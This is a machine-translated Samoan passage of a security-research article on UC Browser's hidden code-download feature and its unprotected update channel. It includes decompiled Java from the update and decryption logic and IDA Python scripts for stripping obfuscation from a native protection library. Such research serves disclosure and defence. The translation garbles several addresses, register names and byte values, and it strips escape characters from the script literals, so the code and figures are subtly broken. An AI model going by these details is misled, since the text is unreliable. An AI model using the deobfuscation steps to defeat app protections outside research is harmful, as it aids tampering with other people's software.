Faatomuaga
I le faaiuga o Mati tatou , na latou mauaina se gafatia natia e utaina ma faʻatautaia le code le faʻamaonia i le UC Browser. O aso nei o le a tatou vaʻavaʻai auiliili pe faʻafefea ona tupu lenei download ma pe faʻafefea ona faʻaogaina e tagata taʻavale mo a latou lava faʻamoemoega.
I se taimi ua mavae, UC Browser na faʻasalalau ma tufatufaina atu ma le malosi: na faʻapipiʻiina i luga o masini a le au faʻaoga e faʻaogaina ai le malware, tufatufaina mai nofoaga eseese i lalo o le foliga o faila vitio (e pei o tagata faʻaoga na latou faʻapipiʻiina, mo se faʻataʻitaʻiga, ata vitio, ae nai lo le mauaina o se APK i lenei suʻesuʻega), faʻaaoga fuʻa mataʻutia ma feʻau o le browser ua tuai, vaivai, ma mea faapena. I le vaega aloaia UC Browser i luga o le VK o loʻo i ai , lea e mafai ai e tagata faʻaoga ona faitio e uiga i faʻasalalauga le talafeagai, e tele faʻataʻitaʻiga iina. I le 2016 sa i ai foi i le gagana Rusia (ioe, faʻasalalauga mo se suʻesuʻega faʻasalalauga).
I le taimi o le tusitusi, UC Browser e silia ma le 500 faʻapipiʻi ile Google Play. E mata'ina lea - na'o Google Chrome e tele atu. Faatasi ai ma iloiloga e mafai ona e vaʻaia le tele o faitioga e uiga i faʻasalalauga ma toe faʻafeiloaʻi i nisi o talosaga ile Google Play. O le mafuaaga lea o la matou suʻesuʻega: na matou filifili e vaʻai pe o faia e le UC Browser se mea leaga. Ma e foliga mai na te faia!
I totonu o le tusi talosaga, o le mafai ona sii mai ma faʻatautaia le code executable na maua, luga ole Google Play. I le faaopoopo atu i le la'uina o le code executable, UC Browser e faia i se auala le saogalemu, lea e mafai ona faʻaaogaina e faʻalauiloa ai se osofaʻiga a le MitM. Sei o tatou vaai pe mafai ona tatou faia se osofaiga faapena.
O mea uma o loʻo tusia i lalo e talafeagai mo le lomiga o le UC Browser na maua ile Google Play ile taimi ole suʻesuʻega:
package: com.UCMobile.intl
versionName: 12.10.8.1172
versionCode: 10598
sha1 APK-файла: f5edb2243413c777172f6362876041eb0c3a928cVeta osofa'i
I le UC Browser faʻaaliga e mafai ona e mauaina se tautua ma se igoa faʻamalamalama com.uc.deployment.UpgradeDeployService.
<service android_exported="false" android_name="com.uc.deployment.UpgradeDeployService" android_process=":deploy" />
A amata lenei auaunaga, e faia e le browser se talosaga POST i , lea e mafai ona vaaia i feoaiga i se taimi pe a uma le amataga. I le tali atu, e mafai ona ia mauaina se poloaiga e sii mai se faʻafouga poʻo se module fou. I le taimi o le auʻiliʻiliga, e leʻi tuʻuina atu e le 'auʻaunaga ia faʻatonuga, ae na matou matauina pe a matou taumafai e tatala se PDF i le browser, e faia se talosaga lona lua i le tuatusi o loʻo faʻamatalaina i luga, a maeʻa ona sii maia le faletusi. Ina ia faia le osofaʻiga, na matou filifili e faʻaoga lenei vaega o le UC Browser: le mafai ona tatala PDF e faʻaaoga ai se faletusi, e le o iai i le APK ma e sii mai i luga ole Initaneti pe a manaʻomia. E taua le maitauina, o le mea moni, UC Browser e mafai ona faʻamalosia e sii mai se mea e aunoa ma le faʻaogaina o tagata faʻaoga - pe afai e te tuʻuina atu se tali lelei i se talosaga e faia pe a uma ona faʻalauiloa le browser. Ae ina ia faia lenei mea, matou te manaʻomia le suʻesuʻeina atili o le faʻasalalauga o fegalegaleaiga ma le 'auʻaunaga, o lea na matou filifili ai o le a sili atu ona faigofie le faʻasaʻoina o le tali faʻalavelave ma sui le faletusi mo le galue ma PDF.
O lea la, pe a manaʻo se tagata faʻaoga e tatala saʻo se PDF i totonu o le masini, o talosaga nei e mafai ona vaʻaia i le fefaʻatauaiga:
Muamua e iai se talosaga POST i , ona
O lo'o la'uina i lalo se fa'amaumauga ma se faletusi mo le matamataina o le PDF ma le ofisa. E talafeagai le manatu o le talosaga muamua e tuʻuina atu faʻamatalaga e uiga i le faiga (a itiiti ifo o le fausaga e tuʻuina atu ai le faletusi manaʻomia), ma i le tali atu i ai e maua e le browser ni faʻamatalaga e uiga i le faletusi e manaʻomia ona sii mai: le tuatusi ma, atonu. , se isi mea. O le fa'afitauli o lenei talosaga ua fa'ailoga.
Talosaga vaega
Tali vaega
O le faletusi lava ia o lo'o afifi i le ZIP ma e le'o fa'ailogaina.
Su'e le code decryption traffic
Sei o tatou taumafai e faauigaina le tali a le server. Se'i tatou va'ai i le fa'ailoga vasega com.uc.deployment.UpgradeDeployService: mai auala onStartCommand alu i le com.uc.deployment.bx, ma mai ai i com.uc.browser.core.dcfe:
public final void e(l arg9) {
int v4_5;
String v3_1;
byte[] v3;
byte[] v1 = null;
if(arg9 == null) {
v3 = v1;
}
else {
v3_1 = arg9.iGX.ipR;
StringBuilder v4 = new StringBuilder("[");
v4.append(v3_1);
v4.append("]product:");
v4.append(arg9.iGX.ipR);
v4 = new StringBuilder("[");
v4.append(v3_1);
v4.append("]version:");
v4.append(arg9.iGX.iEn);
v4 = new StringBuilder("[");
v4.append(v3_1);
v4.append("]upgrade_type:");
v4.append(arg9.iGX.mMode);
v4 = new StringBuilder("[");
v4.append(v3_1);
v4.append("]force_flag:");
v4.append(arg9.iGX.iEo);
v4 = new StringBuilder("[");
v4.append(v3_1);
v4.append("]silent_mode:");
v4.append(arg9.iGX.iDQ);
v4 = new StringBuilder("[");
v4.append(v3_1);
v4.append("]silent_type:");
v4.append(arg9.iGX.iEr);
v4 = new StringBuilder("[");
v4.append(v3_1);
v4.append("]silent_state:");
v4.append(arg9.iGX.iEp);
v4 = new StringBuilder("[");
v4.append(v3_1);
v4.append("]silent_file:");
v4.append(arg9.iGX.iEq);
v4 = new StringBuilder("[");
v4.append(v3_1);
v4.append("]apk_md5:");
v4.append(arg9.iGX.iEl);
v4 = new StringBuilder("[");
v4.append(v3_1);
v4.append("]download_type:");
v4.append(arg9.mDownloadType);
v4 = new StringBuilder("[");
v4.append(v3_1);
v4.append("]download_group:");
v4.append(arg9.mDownloadGroup);
v4 = new StringBuilder("[");
v4.append(v3_1);
v4.append("]download_path:");
v4.append(arg9.iGH);
v4 = new StringBuilder("[");
v4.append(v3_1);
v4.append("]apollo_child_version:");
v4.append(arg9.iGX.iEx);
v4 = new StringBuilder("[");
v4.append(v3_1);
v4.append("]apollo_series:");
v4.append(arg9.iGX.iEw);
v4 = new StringBuilder("[");
v4.append(v3_1);
v4.append("]apollo_cpu_arch:");
v4.append(arg9.iGX.iEt);
v4 = new StringBuilder("[");
v4.append(v3_1);
v4.append("]apollo_cpu_vfp3:");
v4.append(arg9.iGX.iEv);
v4 = new StringBuilder("[");
v4.append(v3_1);
v4.append("]apollo_cpu_vfp:");
v4.append(arg9.iGX.iEu);
ArrayList v3_2 = arg9.iGX.iEz;
if(v3_2 != null && v3_2.size() != 0) {
Iterator v3_3 = v3_2.iterator();
while(v3_3.hasNext()) {
Object v4_1 = v3_3.next();
StringBuilder v5 = new StringBuilder("[");
v5.append(((au)v4_1).getName());
v5.append("]component_name:");
v5.append(((au)v4_1).getName());
v5 = new StringBuilder("[");
v5.append(((au)v4_1).getName());
v5.append("]component_ver_name:");
v5.append(((au)v4_1).aDA());
v5 = new StringBuilder("[");
v5.append(((au)v4_1).getName());
v5.append("]component_ver_code:");
v5.append(((au)v4_1).gBl);
v5 = new StringBuilder("[");
v5.append(((au)v4_1).getName());
v5.append("]component_req_type:");
v5.append(((au)v4_1).gBq);
}
}
j v3_4 = new j();
m.b(v3_4);
h v4_2 = new h();
m.b(v4_2);
ay v5_1 = new ay();
v3_4.hS("");
v3_4.setImsi("");
v3_4.hV("");
v5_1.bPQ = v3_4;
v5_1.bPP = v4_2;
v5_1.yr(arg9.iGX.ipR);
v5_1.gBF = arg9.iGX.mMode;
v5_1.gBI = arg9.iGX.iEz;
v3_2 = v5_1.gAr;
c.aBh();
v3_2.add(g.fs("os_ver", c.getRomInfo()));
v3_2.add(g.fs("processor_arch", com.uc.b.a.a.c.getCpuArch()));
v3_2.add(g.fs("cpu_arch", com.uc.b.a.a.c.Pb()));
String v4_3 = com.uc.b.a.a.c.Pd();
v3_2.add(g.fs("cpu_vfp", v4_3));
v3_2.add(g.fs("net_type", String.valueOf(com.uc.base.system.a.Jo())));
v3_2.add(g.fs("fromhost", arg9.iGX.iEm));
v3_2.add(g.fs("plugin_ver", arg9.iGX.iEn));
v3_2.add(g.fs("target_lang", arg9.iGX.iEs));
v3_2.add(g.fs("vitamio_cpu_arch", arg9.iGX.iEt));
v3_2.add(g.fs("vitamio_vfp", arg9.iGX.iEu));
v3_2.add(g.fs("vitamio_vfp3", arg9.iGX.iEv));
v3_2.add(g.fs("plugin_child_ver", arg9.iGX.iEx));
v3_2.add(g.fs("ver_series", arg9.iGX.iEw));
v3_2.add(g.fs("child_ver", r.aVw()));
v3_2.add(g.fs("cur_ver_md5", arg9.iGX.iEl));
v3_2.add(g.fs("cur_ver_signature", SystemHelper.getUCMSignature()));
v3_2.add(g.fs("upgrade_log", i.bjt()));
v3_2.add(g.fs("silent_install", String.valueOf(arg9.iGX.iDQ)));
v3_2.add(g.fs("silent_state", String.valueOf(arg9.iGX.iEp)));
v3_2.add(g.fs("silent_file", arg9.iGX.iEq));
v3_2.add(g.fs("silent_type", String.valueOf(arg9.iGX.iEr)));
v3_2.add(g.fs("cpu_archit", com.uc.b.a.a.c.Pc()));
v3_2.add(g.fs("cpu_set", SystemHelper.getCpuInstruction()));
boolean v4_4 = v4_3 == null || !v4_3.contains("neon") ? false : true;
v3_2.add(g.fs("neon", String.valueOf(v4_4)));
v3_2.add(g.fs("cpu_cores", String.valueOf(com.uc.b.a.a.c.Jl())));
v3_2.add(g.fs("ram_1", String.valueOf(com.uc.b.a.a.h.Po())));
v3_2.add(g.fs("totalram", String.valueOf(com.uc.b.a.a.h.OL())));
c.aBh();
v3_2.add(g.fs("rom_1", c.getRomInfo()));
v4_5 = e.getScreenWidth();
int v6 = e.getScreenHeight();
StringBuilder v7 = new StringBuilder();
v7.append(v4_5);
v7.append("*");
v7.append(v6);
v3_2.add(g.fs("ss", v7.toString()));
v3_2.add(g.fs("api_level", String.valueOf(Build$VERSION.SDK_INT)));
v3_2.add(g.fs("uc_apk_list", SystemHelper.getUCMobileApks()));
Iterator v4_6 = arg9.iGX.iEA.entrySet().iterator();
while(v4_6.hasNext()) {
Object v6_1 = v4_6.next();
v3_2.add(g.fs(((Map$Entry)v6_1).getKey(), ((Map$Entry)v6_1).getValue()));
}
v3 = v5_1.toByteArray();
}
if(v3 == null) {
this.iGY.iGI.a(arg9, "up_encode", "yes", "fail");
return;
}
v4_5 = this.iGY.iGw ? 0x1F : 0;
if(v3 == null) {
}
else {
v3 = g.i(v4_5, v3);
if(v3 == null) {
}
else {
v1 = new byte[v3.length + 16];
byte[] v6_2 = new byte[16];
Arrays.fill(v6_2, 0);
v6_2[0] = 0x5F;
v6_2[1] = 0;
v6_2[2] = ((byte)v4_5);
v6_2[3] = -50;
System.arraycopy(v6_2, 0, v1, 0, 16);
System.arraycopy(v3, 0, v1, 16, v3.length);
}
}
if(v1 == null) {
this.iGY.iGI.a(arg9, "up_encrypt", "yes", "fail");
return;
}
if(TextUtils.isEmpty(this.iGY.mUpgradeUrl)) {
this.iGY.iGI.a(arg9, "up_url", "yes", "fail");
return;
}
StringBuilder v0 = new StringBuilder("[");
v0.append(arg9.iGX.ipR);
v0.append("]url:");
v0.append(this.iGY.mUpgradeUrl);
com.uc.browser.core.d.c.i v0_1 = this.iGY.iGI;
v3_1 = this.iGY.mUpgradeUrl;
com.uc.base.net.e v0_2 = new com.uc.base.net.e(new com.uc.browser.core.d.c.i$a(v0_1, arg9));
v3_1 = v3_1.contains("?") ? v3_1 + "&dataver=pb" : v3_1 + "?dataver=pb";
n v3_5 = v0_2.uc(v3_1);
m.b(v3_5, false);
v3_5.setMethod("POST");
v3_5.setBodyProvider(v1);
v0_2.b(v3_5);
this.iGY.iGI.a(arg9, "up_null", "yes", "success");
this.iGY.iGI.b(arg9);
}Matou te vaʻai i le faʻatulagaina o se POST talosaga iinei. Matou te gauai atu i le fausiaina o se laina o 16 paita ma lona faʻatumu: 0x5F, 0, 0x1F, -50 (= 0xCE). E fetaui ma le mea na tatou vaʻaia i le talosaga i luga.
I le vasega lava e tasi e mafai ona e vaʻai i se vasega faʻapipiʻi e iai se isi auala manaia:
public final void a(l arg10, byte[] arg11) {
f v0 = this.iGQ;
StringBuilder v1 = new StringBuilder("[");
v1.append(arg10.iGX.ipR);
v1.append("]:UpgradeSuccess");
byte[] v1_1 = null;
if(arg11 == null) {
}
else if(arg11.length < 16) {
}
else {
if(arg11[0] != 0x60 && arg11[3] != 0xFFFFFFD0) {
goto label_57;
}
int v3 = 1;
int v5 = arg11[1] == 1 ? 1 : 0;
if(arg11[2] != 1 && arg11[2] != 11) {
if(arg11[2] == 0x1F) {
}
else {
v3 = 0;
}
}
byte[] v7 = new byte[arg11.length - 16];
System.arraycopy(arg11, 16, v7, 0, v7.length);
if(v3 != 0) {
v7 = g.j(arg11[2], v7);
}
if(v7 == null) {
goto label_57;
}
if(v5 != 0) {
v1_1 = g.P(v7);
goto label_57;
}
v1_1 = v7;
}
label_57:
if(v1_1 == null) {
v0.iGY.iGI.a(arg10, "up_decrypt", "yes", "fail");
return;
}
q v11 = g.b(arg10, v1_1);
if(v11 == null) {
v0.iGY.iGI.a(arg10, "up_decode", "yes", "fail");
return;
}
if(v0.iGY.iGt) {
v0.d(arg10);
}
if(v0.iGY.iGo != null) {
v0.iGY.iGo.a(0, ((o)v11));
}
if(v0.iGY.iGs) {
v0.iGY.a(((o)v11));
v0.iGY.iGI.a(v11, "up_silent", "yes", "success");
v0.iGY.iGI.a(v11);
return;
}
v0.iGY.iGI.a(v11, "up_silent", "no", "success");
}
}
O le auala e ave ai se fa'asologa o bytes e fai ma fa'aoga ma siaki o le zero byte o le 0x60 po'o le tolu byte o le 0xD0, ma le lona lua byte o le 1, 11 po'o le 0x1F. Matou te vaʻavaʻai i le tali mai le 'auʻaunaga: o le zero byte o le 0x60, o le lona lua o le 0x1F, o le lona tolu o le 0x60. E foliga mai o mea tatou te manaʻomia. I le faʻamasinoina o laina ("up_decrypt", mo se faʻataʻitaʻiga), e tatau ona taʻua se metotia iinei e faʻaumatia ai le tali a le server.
Sei o tatou agai atu i le auala gj. Manatua o le finauga muamua o le byte i offset 2 (ie 0x1F i la matou mataupu), ma le lona lua o le tali a le server e aunoa ma
muamua 16 paita.
public static byte[] j(int arg1, byte[] arg2) {
if(arg1 == 1) {
arg2 = c.c(arg2, c.adu);
}
else if(arg1 == 11) {
arg2 = m.aF(arg2);
}
else if(arg1 != 0x1F) {
}
else {
arg2 = EncryptHelper.decrypt(arg2);
}
return arg2;
}
E manino lava, o iinei tatou te filifilia ai se algorithm decryption, ma le pate tutusa o loʻo i totonu o tatou
mataupu e tutusa ma le 0x1F, o loʻo faʻaalia ai se tasi o filifiliga e tolu.
Matou te faʻaauau pea ona suʻeina le code. A maeʻa ni nai oso matou te maua i matou i se metotia ma se igoa faʻamalamalama decryptBytesByKey.
O iinei e lua isi paita e tuueseese mai la tatou tali, ma se manoa e maua mai ia i latou. E manino lava o le auala lea e filifilia ai le ki mo le decrypting o le savali.
private static byte[] decryptBytesByKey(byte[] bytes) {
byte[] v0 = null;
if(bytes != null) {
try {
if(bytes.length < EncryptHelper.PREFIX_BYTES_SIZE) {
}
else if(bytes.length == EncryptHelper.PREFIX_BYTES_SIZE) {
return v0;
}
else {
byte[] prefix = new byte[EncryptHelper.PREFIX_BYTES_SIZE]; // 2 байта
System.arraycopy(bytes, 0, prefix, 0, prefix.length);
String keyId = c.ayR().d(ByteBuffer.wrap(prefix).getShort()); // Выбор ключа
if(keyId == null) {
return v0;
}
else {
a v2 = EncryptHelper.ayL();
if(v2 == null) {
return v0;
}
else {
byte[] enrypted = new byte[bytes.length - EncryptHelper.PREFIX_BYTES_SIZE];
System.arraycopy(bytes, EncryptHelper.PREFIX_BYTES_SIZE, enrypted, 0, enrypted.length);
return v2.l(keyId, enrypted);
}
}
}
}
catch(SecException v7_1) {
EncryptHelper.handleDecryptException(((Throwable)v7_1), v7_1.getErrorCode());
return v0;
}
catch(Throwable v7) {
EncryptHelper.handleDecryptException(v7, 2);
return v0;
}
}
return v0;
}I le vaʻavaʻai i luma, matou te maitauina i le taimi nei matou te leʻi mauaina se ki, ae naʻo lona "faʻamatalaga". O le mauaina o le ki e fai si lavelave.
I le isi metotia, e lua isi faʻamaufaʻailoga e faʻaopoopoina i mea o loʻo i ai nei, e fa ai latou: o le numera faʻailoga 16, o le faʻamatalaga autu, o faʻamatalaga faʻailoga, ma se manoa e le mafai ona malamalama i ai (i lo matou tulaga, gaogao).
public final byte[] l(String keyId, byte[] encrypted) throws SecException {
return this.ayJ().staticBinarySafeDecryptNoB64(16, keyId, encrypted, "");
}A maeʻa se faasologa o suiga tatou te taunuu i le metotia staticBinarySafeDecryptNoB64 faʻamatalaga com.alibaba.wireless.security.open.staticdataencrypt.IStaticDataEncryptComponent. E leai ni vasega i totonu o le numera o talosaga autu e faʻaogaina ai lenei atinaʻe. E i ai se vasega faapena i le faila lib/armeabi-v7a/libsgmain.so, e le o se .so, ae o se fagu. O le metotia matou te fiafia i ai o loʻo faʻatinoina e pei ona taua i lalo:
package com.alibaba.wireless.security.a.i;
// ...
public class a implements IStaticDataEncryptComponent {
private ISecurityGuardPlugin a;
// ...
private byte[] a(int mode, int magicInt, int xzInt, String keyId, byte[] encrypted, String magicString) {
return this.a.getRouter().doCommand(10601, new Object[]{Integer.valueOf(mode), Integer.valueOf(magicInt), Integer.valueOf(xzInt), keyId, encrypted, magicString});
}
// ...
private byte[] b(int magicInt, String keyId, byte[] encrypted, String magicString) {
return this.a(2, magicInt, 0, keyId, encrypted, magicString);
}
// ...
public byte[] staticBinarySafeDecryptNoB64(int magicInt, String keyId, byte[] encrypted, String magicString) throws SecException {
if(keyId != null && keyId.length() > 0 && magicInt >= 0 && magicInt < 19 && encrypted != null && encrypted.length > 0) {
return this.b(magicInt, keyId, encrypted, magicString);
}
throw new SecException("", 301);
}
//...
}
O lo'o fa'aopoopoina la matou lisi o ta'otoga i isi numera lua: 2 ma le 0. Fa'amasino e
mea uma, 2 o lona uiga decryption, pei o le auala faiFa'aiuga vasega faiga javax.crypto.Cipher. Ma o nei mea uma e tuʻuina atu i se auala faʻapitoa ma le numera 10601 - e foliga mai o le numera o le poloaiga.
A maeʻa le isi filifili o suiga tatou te maua se vasega e faʻaaogaina le atinaʻe IRouterComponent ma metotia faiCommand:
package com.alibaba.wireless.security.mainplugin;
import com.alibaba.wireless.security.framework.IRouterComponent;
import com.taobao.wireless.security.adapter.JNICLibrary;
public class a implements IRouterComponent {
public a() {
super();
}
public Object doCommand(int arg2, Object[] arg3) {
return JNICLibrary.doCommandNative(arg2, arg3);
}
}Ma le vasega foi JNICLlibrary, lea e faailoa mai ai le auala masani doCommandNative:
package com.taobao.wireless.security.adapter;
public class JNICLibrary {
public static native Object doCommandNative(int arg0, Object[] arg1);
}O lona uiga e mana'omia ona tatou su'e se metotia ile tulafono fa'ale-aganu'u doCommandNative. Ma o iinei e amata ai le fiafia.
Obfusification o le numera masini
I le faila libsgmain.so (lea e moni lava o se .jar ma lea na matou maua ai le faʻatinoina o nisi faʻamatalaga faʻapipiʻi fesoʻotaʻiga i luga aʻe) e tasi le faletusi faʻapitoa: libsgmainso-6.4.36.so. Matou te tatalaina i le IDA ma maua le tele o pusa talatalanoa ma mea sese. O le fa'afitauli e le aoga le laulau ulutala vaega. E faia lenei mea ma le faʻamoemoe e faʻalavelave ai le auiliiliga.
Ae e le manaʻomia: ia saʻo le utaina o se faila ELF ma auʻiliʻili, e lava le laulau ulutala polokalame. O le mea lea, naʻo le tapeina o le laulau vaega, faʻamalo ese fanua tutusa i le ulutala.
Toe tatala le faila ile IDA.
E lua auala e taʻu atu ai i le Java virtual machine le mea tonu i totonu o le faletusi a le atunuu o loʻo i ai le faʻatinoga o se metotia faʻaalia i le Java code o loʻo i ai. O le mea muamua e tu'u i ai se igoa o ituaiga Java_package_name_ClassName_MethodName.
O le lona lua o le resitalaina pe a utaina le faletusi (i le galuega JNI_OnLoad)
fa'aaogaina o se vala'au galuega RegisterNatives.
I la tatou tulaga, afai tatou te faʻaogaina le auala muamua, o le igoa e tatau ona pei o lenei: Java_com_taobao_wireless_security_adapter_JNICLlibrary_doCommandNative.
E leai se galuega faʻapea i totonu o galuega faʻatau atu, o lona uiga e tatau ona e suʻeina se telefoni RegisterNatives.
Tatou o i le galuega JNI_OnLoad ma tatou vaai i le ata lenei:
O le a le mea o tupu iinei? I le tepa muamua, o le amataga ma le faaiuga o le galuega e masani mo le fausaga o le ARM. O le faʻatonuga muamua i luga o le faaputuga o loʻo teuina mea o loʻo i totonu o tusi resitala o le a faʻaaogaina e le galuega i lona faʻagaioiga (i lenei tulaga, R0, R1 ma R2), faʻapea foʻi ma mea o loʻo i totonu o le resitala LR, lea e aofia ai le tuatusi toe foʻi mai le galuega. . O le faʻatonuga mulimuli e toe faʻafoʻisia ai tusi resitala faʻasaoina, ma o le tuatusi toe foʻi e tuʻuina vave i totonu o le resitala PC - ma toe foʻi mai le galuega. Ae afai e te vaʻavaʻai totoʻa, o le a e maitauina o le faʻatonuga mulimuli e suia ai le tuatusi toe foʻi o loʻo teuina i luga o le faaputuga. Sei o tatou fuafua pe faape'i
fa'atinoga code. O se tuatusi patino 1xB0 o loʻo faʻapipiʻiina i totonu o le R130, 5 ua toesea mai ai, ona tuʻuina atu lea i le R0 ma faʻaopoopo i ai le 0x10. E aliali mai 0xB13B. O le mea lea, e manatu le IDA o le faʻatonuga mulimuli o se galuega masani e toe foʻi mai, ae o le mea moni o loʻo alu i le tuatusi faʻatulagaina 0xB13B.
E taua le manatuaina iinei o le ARM processors e lua auala ma lua seti o faʻatonuga: ARM ma Thumb. O le pito sili ona taua o le tuatusi e ta'u atu i le processor po'o fea fa'atonuga o lo'o fa'aogaina. O lona uiga, o le tuatusi o le 0xB13A, ma o le tasi i le pito sili ona taua o loʻo faʻaalia ai le Thumb mode.
O se "adapter" tutusa ua faaopoopo i le amataga o galuega taitasi i totonu o lenei faletusi ma
tulafono lapisi. O le a tatou le toe mafaufau atili ia i latou - tatou te manatua
o le amataga moni o le toetoe lava o galuega uma e fai si mamao.
Talu ai e le o oso manino le code i le 0xB13A, IDA lava ia na le iloa o le code na tu i lenei nofoaga. Mo le mafuaaga lava e tasi, e le o iloa le tele o le code i totonu o le faletusi o se code, lea e faigata ai le auiliiliga. Matou te taʻu atu i le IDA o le code lea, ma o le mea lea e tupu:
Ole laulau e amata manino ile 0xB144. O le a le mea o lo'o i le sub_494C?
Pe a valaʻau lenei galuega i le LR resitala, matou te maua le tuatusi o le laulau na taʻua muamua (0xB144). I le R0 - index i lenei laulau. O lona uiga, o le tau e ave mai le laulau, faʻaopoopo i le LR ma o le iʻuga
le tuatusi e alu i ai. Tatou taumafai e fa'atatau: 0xB144 + [0xB144 + 8* 4] = 0xB144 + 0x120 = 0xB264. Matou te alu i le tuatusi na maua ma vaʻai moni i ni faʻatonuga aoga ma toe alu i le 0xB140:
Ole taimi nei ole a iai se suiga ile offset ile index 0x20 mai le laulau.
Faʻamasino i le tele o le laulau, o le a tele na suiga i le code. O le fesili e tulaʻi mai pe mafai ona faʻatautaia lenei mea e sili atu ona otometi, e aunoa ma le faʻatulagaina ma le lima o tuatusi. Ma o tusitusiga ma le mafai ona faʻapipiʻi le code i le IDA e fesoasoani ia i matou:
def put_unconditional_branch(source, destination):
offset = (destination - source - 4) >> 1
if offset > 2097151 or offset < -2097152:
raise RuntimeError("Invalid offset")
if offset > 1023 or offset < -1024:
instruction1 = 0xf000 | ((offset >> 11) & 0x7ff)
instruction2 = 0xb800 | (offset & 0x7ff)
patch_word(source, instruction1)
patch_word(source + 2, instruction2)
else:
instruction = 0xe000 | (offset & 0x7ff)
patch_word(source, instruction)
ea = here()
if get_wide_word(ea) == 0xb503: #PUSH {R0,R1,LR}
ea1 = ea + 2
if get_wide_word(ea1) == 0xbf00: #NOP
ea1 += 2
if get_operand_type(ea1, 0) == 1 and get_operand_value(ea1, 0) == 0 and get_operand_type(ea1, 1) == 2:
index = get_wide_dword(get_operand_value(ea1, 1))
print "index =", hex(index)
ea1 += 2
if get_operand_type(ea1, 0) == 7:
table = get_operand_value(ea1, 0) + 4
elif get_operand_type(ea1, 1) == 2:
table = get_operand_value(ea1, 1) + 4
else:
print "Wrong operand type on", hex(ea1), "-", get_operand_type(ea1, 0), get_operand_type(ea1, 1)
table = None
if table is None:
print "Unable to find table"
else:
print "table =", hex(table)
offset = get_wide_dword(table + (index << 2))
put_unconditional_branch(ea, table + offset)
else:
print "Unknown code", get_operand_type(ea1, 0), get_operand_value(ea1, 0), get_operand_type(ea1, 1) == 2
else:
print "Unable to detect first instruction"Tu'u le fetuu ile laina 0xB26A, fa'agasolo le tusitusiga ma va'ai le suiga ile 0xB4B0:
E le'i iloa e le IDA lenei vaega o se fa'ailoga. Matou te fesoasoani ia te ia ma vaʻai i se isi mamanu iina:
O faʻatonuga pe a uma le BLX e foliga mai e leai se aoga tele, e pei lava o se ituaiga o suiga. Sei o tatou tilotilo i le sub_4964:
Ma o le mea moni, o iinei o se upu e ave i le tuatusi o loʻo taoto i le LR, faʻaopoopo i lenei tuatusi, a maeʻa ona ave le tau i le tuatusi faʻaiʻuga ma tuʻu i luga o le faaputuga. E le gata i lea, ua faaopoopo le 4 i le LR ina ia a uma ona toe foi mai le galuega, o lenei lava offset e misia. A mae'a ona ave lea e le POP {R1} le tau o le fa'aputuga. Afai e te vaʻai i le mea o loʻo i ai ile tuatusi 0xB4BA + 0xEA = 0xB5A4, o le a e vaʻai i se mea e tutusa ma se laulau tuatusi:
Ina ia faʻapipiʻi lenei mamanu, e te manaʻomia le mauaina o ni faʻamaufaʻailoga se lua mai le code: le offset ma le numera resitala e te manaʻo e tuʻu ai le iʻuga. Mo resitara taitasi e mafai, e tatau ona e saunia muamua se fasi code.
patches = {}
patches[0] = (0x00, 0xbf, 0x01, 0x48, 0x00, 0x68, 0x02, 0xe0)
patches[1] = (0x00, 0xbf, 0x01, 0x49, 0x09, 0x68, 0x02, 0xe0)
patches[2] = (0x00, 0xbf, 0x01, 0x4a, 0x12, 0x68, 0x02, 0xe0)
patches[3] = (0x00, 0xbf, 0x01, 0x4b, 0x1b, 0x68, 0x02, 0xe0)
patches[4] = (0x00, 0xbf, 0x01, 0x4c, 0x24, 0x68, 0x02, 0xe0)
patches[5] = (0x00, 0xbf, 0x01, 0x4d, 0x2d, 0x68, 0x02, 0xe0)
patches[8] = (0x00, 0xbf, 0xdf, 0xf8, 0x06, 0x80, 0xd8, 0xf8, 0x00, 0x80, 0x01, 0xe0)
patches[9] = (0x00, 0xbf, 0xdf, 0xf8, 0x06, 0x90, 0xd9, 0xf8, 0x00, 0x90, 0x01, 0xe0)
patches[10] = (0x00, 0xbf, 0xdf, 0xf8, 0x06, 0xa0, 0xda, 0xf8, 0x00, 0xa0, 0x01, 0xe0)
patches[11] = (0x00, 0xbf, 0xdf, 0xf8, 0x06, 0xb0, 0xdb, 0xf8, 0x00, 0xb0, 0x01, 0xe0)
ea = here()
if (get_wide_word(ea) == 0xb082 #SUB SP, SP, #8
and get_wide_word(ea + 2) == 0xb503): #PUSH {R0,R1,LR}
if get_operand_type(ea + 4, 0) == 7:
pop = get_bytes(ea + 12, 4, 0)
if pop[1] == 'xbc':
register = -1
r = get_wide_byte(ea + 12)
for i in range(8):
if r == (1 << i):
register = i
break
if register == -1:
print "Unable to detect register"
else:
address = get_wide_dword(ea + 8) + ea + 8
for b in patches[register]:
patch_byte(ea, b)
ea += 1
if ea % 4 != 0:
ea += 2
patch_dword(ea, address)
elif pop[:3] == 'x5dxf8x04':
register = ord(pop[3]) >> 4
if register in patches:
address = get_wide_dword(ea + 8) + ea + 8
for b in patches[register]:
patch_byte(ea, b)
ea += 1
patch_dword(ea, address)
else:
print "POP instruction not found"
else:
print "Wrong operand type on +4:", get_operand_type(ea + 4, 0)
else:
print "Unable to detect first instructions"Matou te tuʻuina le faʻailoga i le amataga o le fausaga matou te manaʻo e sui - 0xB4B2 - ma faʻatautaia le tusitusiga:
I le faaopoopo atu i fausaga ua uma ona taʻua, o loʻo i ai foi i le code mea nei:
E pei o le mataupu muamua, a maeʻa le faʻatonuga BLX o loʻo i ai se faʻasalaga:
Matou te ave le offset i le tuatusi mai le LR, faʻaopoopo i le LR ma alu i ai. 0x72044 + 0xC = 0x72050. O le tusitusiga mo lenei mamanu e fai si faigofie:
def put_unconditional_branch(source, destination):
offset = (destination - source - 4) >> 1
if offset > 2097151 or offset < -2097152:
raise RuntimeError("Invalid offset")
if offset > 1023 or offset < -1024:
instruction1 = 0xf000 | ((offset >> 11) & 0x7ff)
instruction2 = 0xb800 | (offset & 0x7ff)
patch_word(source, instruction1)
patch_word(source + 2, instruction2)
else:
instruction = 0xe000 | (offset & 0x7ff)
patch_word(source, instruction)
ea = here()
if get_wide_word(ea) == 0xb503: #PUSH {R0,R1,LR}
ea1 = ea + 6
if get_wide_word(ea + 2) == 0xbf00: #NOP
ea1 += 2
offset = get_wide_dword(ea1)
put_unconditional_branch(ea, (ea1 + offset) & 0xffffffff)
else:
print "Unable to detect first instruction"I'uga o le fa'atinoina o tusitusiga:
A maeʻa loa mea uma i le galuega, e mafai ona e faʻasino le IDA i lona amataga moni. O le a faʻapipiʻi faʻatasi uma le code function, ma e mafai ona faʻapipiʻiina e faʻaaoga ai le HexRays.
Filifilia o manoa
